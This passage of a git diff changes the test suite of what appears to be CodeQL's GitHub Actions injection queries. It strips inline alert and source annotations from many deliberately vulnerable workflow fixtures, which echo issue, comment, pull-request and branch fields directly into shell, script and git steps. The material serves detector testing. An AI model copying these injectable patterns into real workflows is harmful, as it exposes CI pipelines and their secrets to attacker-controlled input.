.github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref index 3475e69cd3ad..a2f6e1c12b9c 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref @@ -1,2 +1 @@ -query: experimental/Security/CWE-088/ArgumentInjectionCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-088/ArgumentInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 981e5b865494..12171d8c7f27 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected @@ -1,4 +1,3 @@ -#select edges | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | @@ -21,3 +20,4 @@ nodes | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref index 3aa94b52965a..b96467552c5b 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref @@ -1,2 +1 @@ -query: experimental/Security/CWE-088/ArgumentInjectionMedium.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-088/ArgumentInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml index bed01ffea540..ba7d3eec1af7 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml @@ -4,4 +4,4 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] + run: echo '${{ github.event.pull_request.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml index f4a9d4574528..510ad86cbfa9 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml @@ -6,4 +6,4 @@ runs: - shell: bash env: FOO: ${{ secrets.FOO}} - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/medium] + run: echo '${{ github.event.pull_request.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml index 6c63aa58afa5..ba7d3eec1af7 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml @@ -4,4 +4,4 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/medium] + run: echo '${{ github.event.pull_request.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index 75a02958a998..53a2e0c87e27 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -16,7 +16,7 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.issue.body }}' # $ Alert[actions/code-injection/critical] + run: echo '${{ github.event.issue.body }}' - name: Step id: step env: @@ -25,10 +25,10 @@ runs: run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT - id: step2 env: - FOO2: ${{ github.event.issue.body }} # $ Source[actions/code-injection/critical] + FOO2: ${{ github.event.issue.body }} shell: bash run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink id: sink shell: bash - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] + run: echo "${{ inputs.taint }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml index 25b58d07466c..0048a4ca31e1 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml @@ -213,7 +213,7 @@ runs: run: | git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}" - git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/critical] + git pull origin ${{ github.head_ref || github.ref }} git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml index 0a37ade5da63..8bffcdc4020e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml @@ -74,7 +74,7 @@ runs: # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli run: | packages="ultralytics-actions" - if [ "${{ inputs.spelling }}" = "true" ]; then # $ Alert[actions/code-injection/medium] + if [ "${{ inputs.spelling }}" = "true" ]; then packages="$packages codespell tomli" fi @@ -211,10 +211,10 @@ runs: - name: Commit and Push Changes if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' run: | - git config --global user.name "${{ inputs.github_username }}" # $ Alert[actions/code-injection/medium] - git config --global user.email "${{ inputs.github_email }}" # $ Alert[actions/code-injection/medium] + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" # this action is not called in the test - git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/medium] + git pull origin ${{ github.head_ref || github.ref }} git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml index cd9dcaf1a0b0..398c0ee6a6e1 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml @@ -19,7 +19,7 @@ runs: using: composite steps: - shell: bash - run: echo "${{ inputs.title }}" # $ Alert[actions/code-injection/critical] + run: echo "${{ inputs.title }}" - uses: frabert/replace-string-action@v2.5 id: out with: diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml index 85decb599321..a8019fbbf145 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml @@ -93,7 +93,7 @@ runs: shell: bash - shell: bash run: | - echo "${{ inputs.body }}" # $ Alert[actions/code-injection/critical] + echo "${{ inputs.body }}" # Checkout Repository ---------------------------------------------------------------------------------------------- - name: Checkout Repository @@ -220,7 +220,7 @@ runs: run: | git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}" - git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/critical] + git pull origin ${{ github.head_ref || github.ref }} git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml index 301be58e2e80..7b9c57354882 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml @@ -14,7 +14,7 @@ jobs: - uses: actions/checkout@v2 - name: Remove conflicting chars env: - ISSUE_TITLE: ${{github.event.issue.title}} # $ Source[actions/code-injection/critical] + ISSUE_TITLE: ${{github.event.issue.title}} uses: frabert/replace-string-action@1.2 id: remove_quotations with: @@ -24,6 +24,6 @@ jobs: - name: Check info id: check-info run: | - echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV # $ Alert[actions/code-injection/critical] + echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml index c4add3b215ec..5cf7bbd4e6bd 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml @@ -17,12 +17,12 @@ jobs: workflow: ${{ github.event.workflow_run.workflow_id }} name: pr - - name: save PR id # $ Source[actions/code-injection/critical] + - name: save PR id id: pr run: echo "::set-output name=id::$(> $GITHUB_OUTPUT - - run: echo ${{ steps.prepare.outputs.pr }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ steps.prepare.outputs.pr }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml index 2d1acd97b2dc..63acdc612b0e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml @@ -14,9 +14,9 @@ jobs: name: artifact # Save PR id to output - - name: Save artifact data # $ Source[actions/code-injection/critical] + - name: Save artifact data id: artifact run: echo "::set-output name=id::$(> $GITHUB_ENV # $ Alert[actions/code-injection/medium] + echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV #If a target branch was found will run the action - if: env.destination_branch != 'invalid' @@ -50,7 +50,7 @@ jobs: git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} git cherry-pick -x ${{github.event.after}} --strategy-option theirs git push -u origin ${{env.auto_branch}} - hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" # $ Alert[actions/code-injection/medium] + hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" env: #Token used for the pull request. Corresponds to the DynamoBot account GITHUB_TOKEN: ${{secrets.DYNAMOBOTTOKEN}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml index d07398ebca72..fdb140ec3802 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml @@ -4,5 +4,5 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.discussion.title }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.discussion.body }}' # $ Alert[actions/code-injection/critical] \ No newline at end of file + - run: echo '${{ github.event.discussion.title }}' + - run: echo '${{ github.event.discussion.body }}' \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml index 5cdf5c0bf62d..649d3a6e1319 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml @@ -4,6 +4,6 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.discussion.title }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.discussion.body }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.comment.body }}' # $ Alert[actions/code-injection/critical] \ No newline at end of file + - run: echo '${{ github.event.discussion.title }}' + - run: echo '${{ github.event.discussion.body }}' + - run: echo '${{ github.event.comment.body }}' \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml index 0da70f8e2d4a..b4c2ecaec700 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml @@ -81,7 +81,7 @@ jobs: git push \ "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \ - 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] + 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' env: BOT_PA_TOKEN: ${{ secrets.githubBotPAT }} @@ -91,4 +91,4 @@ jobs: with: github-token: ${{ secrets.githubBotPAT }} script: | - const fileList = `${{ steps.git-commit.outputs.file-list }}` # $ Alert[actions/code-injection/critical] + const fileList = `${{ steps.git-commit.outputs.file-list }}` diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml index 333af0376ca0..0c4aa93c7a58 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' with: result-encoding: string script: | @@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; # $ Alert[actions/code-injection/critical] + const log = '${{ env.log }}'; let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { @@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/critical] + const prevLog = '${{ env.prev_log }}'; const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml index 38a6bcbd6af5..a952c8c1ab85 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml @@ -4,8 +4,8 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pages[1].title }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.pages[11].title }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.pages[0].page_name }}' # $ Alert[actions/code-injection/medium] - - run: echo '${{ github.event.pages[2222].page_name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.pages[1].title }}' + - run: echo '${{ github.event.pages[11].title }}' + - run: echo '${{ github.event.pages[0].page_name }}' + - run: echo '${{ github.event.pages[2222].page_name }}' - run: echo '${{ toJSON(github.event.pages.*.title) }}' # safe \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml index 4180c7d6769b..c8a30dad2944 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml @@ -15,7 +15,7 @@ jobs: - name: Extract and Clean Initial URL id: extract-url env: - BODY: ${{ github.event.comment.body }} # $ Source[actions/code-injection/critical] + BODY: ${{ github.event.comment.body }} run: | echo "::set-output name=initial_url::$BODY" @@ -34,4 +34,4 @@ jobs: - name: Update Comment with New URL run: | - NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" # $ Alert[actions/code-injection/critical] + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index 57df1a28983f..1ad46b0f6eb1 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files # $ Source[actions/code-injection/medium] + - name: Remove foo from changed files id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -40,4 +40,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml index d32f1f2c1a87..4f149a920419 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files # $ Source[actions/code-injection/medium] + - name: Remove foo from changed files id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -40,4 +40,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml index 4d838b0d465a..21fa789d9e7d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files # $ Source[actions/code-injection/medium] + - name: Remove foo from changed files id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -42,4 +42,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml index fc56cbc51211..b964bb78dac3 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files # $ Source[actions/code-injection/medium] + - name: Remove foo from changed files id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -41,4 +41,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml index d075aecd67e7..d6b7b2b1b0c5 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml @@ -42,4 +42,4 @@ jobs: steps: - id: sink # Should not be reported since job1 is not needed - run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml index 348fe03ec72a..5e767ce0239f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml @@ -1,20 +1,20 @@ on: issues env: - global_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] + global_env: ${{ github.event.issue.title }} test: test jobs: echo-chamber: env: - job_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] + job_env: ${{ github.event.issue.title }} runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.issue.title }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ github.event.issue.body }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ env.global_env }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.issue.title }}' + - run: echo '${{ github.event.issue.body }}' + - run: echo '${{ env.global_env }}' - run: echo '${{ env.test }}' - - run: echo '${{ env.job_env }}' # $ Alert[actions/code-injection/critical] - - run: echo '${{ env.step_env }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ env.job_env }}' + - run: echo '${{ env.step_env }}' env: - step_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] + step_env: ${{ github.event.issue.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml index bfb4c4888624..b17a1fecbeb4 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest if: ${{ github.event.comment.body == '/jira ticket' }} steps: - - run: echo ${{ github.event.comment.body }} # $ Alert[actions/code-injection/critical] + - run: echo ${{ github.event.comment.body }} - name: Login uses: atlassian/gajira-login@v3 @@ -20,7 +20,7 @@ jobs: JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }} - name: SearchParam - run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' # $ Alert[actions/code-injection/critical] + run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' - name: Search id: search diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml index ad5d52fcb6bc..ad9187a3d6bf 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml @@ -41,7 +41,7 @@ jobs: run: | echo "Checking issue body for profanities..." PROFANITIES_LIST="bad|disguting|horrible" - if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then # $ Alert[actions/code-injection/critical] + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then echo "Profanity detected in issue body. Please clean up the language." exit 1 else @@ -66,7 +66,7 @@ jobs: uses: actions/github-script@v5 with: script: | - const commentBody = "${{ github.event.comment.body }}"; # $ Alert[actions/code-injection/critical] + const commentBody = "${{ github.event.comment.body }}"; let response; if (commentBody.includes("hello")) { response = "Hello! How can I help you today?"; diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml index bd378f614064..826051dfc5ac 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml @@ -34,4 +34,4 @@ jobs: pr-message: 'Message that will be displayed on users first pr' - name: Log test executions run: | - echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." # $ Alert[actions/code-injection/critical] + echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml index 3ab37e1e4dba..560e69f9e4b0 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml @@ -11,4 +11,4 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.pull_request.body }}" # $ Alert[actions/code-injection/medium] + - run: echo "${{ 